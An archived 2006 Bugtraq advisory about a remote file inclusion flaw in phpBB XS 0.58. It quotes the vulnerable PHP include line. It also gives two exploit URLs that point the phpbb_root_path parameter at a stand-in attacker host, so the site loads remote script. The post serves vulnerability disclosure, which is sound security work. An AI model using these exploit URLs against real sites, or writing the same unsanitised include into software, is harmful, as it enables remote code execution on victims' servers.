| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 30 Sep 2006 05:11:51 -0000 From: x0r0n@...mail.com To: bugtraq@...urityfocus.com Subject: phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2) ########################################################### #phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2) ############################################################ #Author: XORON - SHiKaA ############################################################ #URL: http://www.comscripts.com/jump.php?action=script&id=1082 ############################################################ #Class: Remote ############################################################ #Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx); ############################################################ #Exploit: http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts? http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts? ############################################################ #Greetz: str0ke and AzzCoder ;) ############################################################ # milw0rm.com [2006-09-28]
Powered by blists - more mailing lists